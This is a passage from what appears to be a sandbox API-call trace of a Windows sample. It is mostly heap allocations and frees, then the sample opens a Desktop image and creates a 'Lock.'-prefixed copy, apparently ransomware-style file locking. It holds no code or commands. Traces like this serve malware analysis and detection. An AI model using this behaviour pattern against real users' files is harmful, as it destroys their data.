lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0165.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0165.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0165.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0165.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0165.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0165.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.731] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0165.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0165.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0165.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0165.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0165.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0165.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0165.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0165.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0165.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0165.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0165.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0165.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0165.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0165.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0165.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0165.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0165.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0165.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0165.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0165.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0165.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0165.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0165.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0165.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0165.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0165.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0165.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0165.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0165.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0165.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0165.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0165.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0165.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0165.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0165.735] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.735] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.735] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.735] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.735] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/gXTZQTDkC2czFZpWnC.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gxtzqtdkc2czfzpwnc.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0165.735] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.735] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0165.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0165.736] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.736] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.736] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0165.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0165.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.736] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.gXTZQTDkC2czFZpWnC.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.gxtzqtdkc2czfzpwnc.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0165.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0165.737] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0165.737] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.737] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0165.737] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0165.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0165.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.737] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0165.737] ReadFile (in: hFile=0x1e8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x5d6d, lpOverlapped=0x0) returned 1 [0165.738] ReadFile (in: hFile=0x1e8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0165.739] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0165.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5d6d) returned 0x34a2048 [0165.739] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0165.739] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0165.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0165.739] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0165.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0165.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1bc8 [0165.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0165.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5d6d) returned 0x34a2048 [0165.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0165.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0165.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0165.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0165.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c98 [0165.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0165.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ba8 [0165.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0165.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0165.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0165.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0165.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0165.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5d6d) returned 0x24dd7d0 [0165.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0165.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0165.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0165.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0165.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0165.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0165.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0165.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0165.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0165.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0165.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0165.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0165.742] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0165.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0165.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0165.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0165.742] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0165.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0165.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0165.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0165.743] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 